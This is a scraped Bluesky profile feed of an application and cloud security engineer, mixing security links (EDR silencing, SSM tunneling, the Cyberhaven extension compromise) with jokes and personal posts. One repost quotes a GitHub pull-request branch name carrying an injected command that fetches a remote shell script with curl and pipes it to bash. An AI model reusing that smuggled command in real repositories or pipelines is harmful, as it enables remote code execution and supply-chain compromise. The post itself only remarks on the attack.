bruno
LightNews LightNews
banner
0xbruno.bsky.social
bruno
@0xbruno.bsky.social
72 followers 310 following 33 posts
application & cloud security stuff | philosophy, chess, weight lifting, and whiskey enjoyer
Posts Replies Media Videos
0xbruno.bsky.social
surprised I haven’t heard much from infosec community about OTP phishing
August 12, 2025 at 10:34 PM
0xbruno.bsky.social
SOCKS over SSH over AWS SSM Session Manager

0xbruno.dev/posts/cloud/...
SSH Tunneling over SSM Session Manager
During my day job, I was assisting a developer remotely develop on an EC2 instance using the VSCode extension “Remote - SSH”. As a Security Engineer™, I would prefer not to open any SSH ports to the i...
0xbruno.dev
July 30, 2025 at 4:13 AM
0xbruno.bsky.social
Pentester = almost a hacker
merriam-webster.com Merriam-Webster @merriam-webster.com · Mar 31
The prefix ‘pen’ means “almost.”

peninsula = almost an island
penultimate = almost the last
March 31, 2025 at 8:01 PM
Reposted by bruno
xpnsec.com
On PTO and bored, so playing around with MCP by exposing Mythic APIs to Claude and seeing what the result. Attempting to have it emulate threat actors while operating Apollo in a lab... would make a good sparring partner :D www.youtube.com/watch?v=ZooT...
Mythic MCP - Claude Sonnet driving Mythic (Apollo)
YouTube video by Adam Chester
www.youtube.com
March 20, 2025 at 10:24 PM
0xbruno.bsky.social
I’m assuming if an Entra ID tenant has Certificate Based Authentication enabled and the CAs trusted, you could pivot from on prem ADCS issues like ESC1 to the cloud ? 🤔
March 12, 2025 at 9:12 PM
Reposted by bruno
techbytom.bsky.social
Wow, how did I not use this yet?! github.com/alufers/mitm...
GitHub - alufers/mitmproxy2swagger: Automagically reverse-engineer REST APIs via capturing traffic
Automagically reverse-engineer REST APIs via capturing traffic - alufers/mitmproxy2swagger
github.com
January 6, 2025 at 4:21 PM
Reposted by bruno
cyb3rmonk.bsky.social
[NEW BLOG]
EDR Silencer and Beyond: Exploring Methods to Block EDR Communication - Part 2

In collaboration with
@fabian.bader.cloud


academy.bluraven.io/blog/edr-sil...

#redteam
EDR Silencer and Beyond: Exploring Methods to Block EDR Communication - Part 2
Alternative methods for EDR Silencers for blocking EDR communication to disable defenses.
academy.bluraven.io
December 1, 2024 at 5:32 PM
0xbruno.bsky.social
cool seeing people I look up to talk more intelligently about the EDR silencing techniques

I talked about Hosts file and a local bring-your-own HTTP CONNECT “firewall” sinkhole back in November

0xbruno.dev/posts/resear...

academy.bluraven.io/blog/edr-sil...

@cyb3rmonk.bsky.social
EDR Silencer and Beyond: Exploring Methods to Block EDR Communication - Part 2
Alternative methods for EDR Silencers for blocking EDR communication to disable defenses.
academy.bluraven.io
January 2, 2025 at 6:39 PM
Reposted by bruno
mattjay.com
An attacker successfully phished a Cyberhaven employee.

They gained access to their Chrome Web Store admin credentials and published a malicious version of the Cyberhaven extension.

Read my full writeup here:

www.vulnu.com/p/breaking-c...

Thanks @jaimeblascob.bsky.social and @johntuckner.me
Breaking: Cyberhaven Chrome Extension Compromised in Holiday Attack Campaign
An attacker successfully phished a Cyberhaven employee, gained access to Chrome Web Store admin credentials, published a malicious version of the extension
www.vulnu.com
December 27, 2024 at 3:20 AM
0xbruno.bsky.social
when you have to push a remediation for a dumb security bug for compliance and devs look at you diff
December 27, 2024 at 2:12 AM
0xbruno.bsky.social
December 27, 2024 at 2:09 AM
0xbruno.bsky.social
December 25, 2024 at 1:19 AM
Reposted by bruno
drgurner.bsky.social
The struggle is real.
December 24, 2024 at 4:24 PM
0xbruno.bsky.social
At this pace security appliances getting popped more than other software 😅
ajxchapman.bsky.social Alex Chapman @ajxchapman.bsky.social · Dec 18
CVE-2023-34990 🤦‍♂️🤦‍♂️
December 22, 2024 at 11:33 PM
0xbruno.bsky.social
Wonder who’s gonna be the Docker and k8s of agentic AI and orchestration. Think infosec will probably pivot to abusing the orchestration flows and architecture of agentic AI. Essentially adding an abstraction layer but we’ll still need knowledge of the underlying systems
December 20, 2024 at 7:51 PM
0xbruno.bsky.social
☹️
December 20, 2024 at 2:58 PM
0xbruno.bsky.social
protonmail is down and their status page doesn’t reflect any errors >:(

status.proton.me
Proton Services Status
Welcome to Proton Services's home for real-time and historical data on system performance.
status.proton.me
December 17, 2024 at 10:36 PM
0xbruno.bsky.social
pentesters when they remember they left an unprotected webshell on an engagement months ago
December 12, 2024 at 6:41 PM
Reposted by bruno
aaron.cat.gf
blunt versus beauty
A simple black and white cartoon illustration showing a stylized representation of "ALL MODERN DIGITAL INFRASTRUCTURE" as a tower-like structure made of various rectangular blocks and components. Each component and layer of the structure is labeled with the word "backdoor" multiple times, suggesting widespread security vulnerabilities in digital systems. The illustration uses a minimalist style with basic geometric shapes and text annotations connected by lines pointing to different parts of the structure. A diagram from Kaspersky showing the Operation Triangulation attack chain with neon green icons and text connected by dotted arrows. The chain begins with an “Attackers iMessage account” and progresses through multiple stages including PDF file, TrueType font exploit, ROP/JOP, NSExpression, bplist, and other technical components. Various CVE numbers are listed, including CVE-2023-41990, CVE-2023-32434, and CVE-2023-38606. The chain culminates in malware deployment through multiple exploitation steps involving Safari, kernel exploits, and validators.
December 9, 2024 at 5:01 PM
Reposted by bruno
endingwithali.com
ethernet? you mean the wifi cable
December 9, 2024 at 5:01 PM
0xbruno.bsky.social
getting to work with people much smarter than you is such an underrated benefit
December 6, 2024 at 11:44 PM
0xbruno.bsky.social
find those sweet creds in azure container app env vars

github.com/0xBruno/Get-...
GitHub - 0xBruno/Get-AzureContainerAppEnvVars: get env vars for azure container apps for easy auditing of sensitive information
get env vars for azure container apps for easy auditing of sensitive information - 0xBruno/Get-AzureContainerAppEnvVars
github.com
December 6, 2024 at 11:10 PM
Reposted by bruno
mattkeeter.com
absolutely incredible attack vector
Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
December 6, 2024 at 3:27 AM
Reposted by bruno
sotocolor.bsky.social
December 5, 2024 at 11:58 PM
0xbruno.bsky.social
reading Fear and Trembling by Kierkegaard hoping for some deep insights. summary is “just trust me bro” -god
December 4, 2024 at 12:41 AM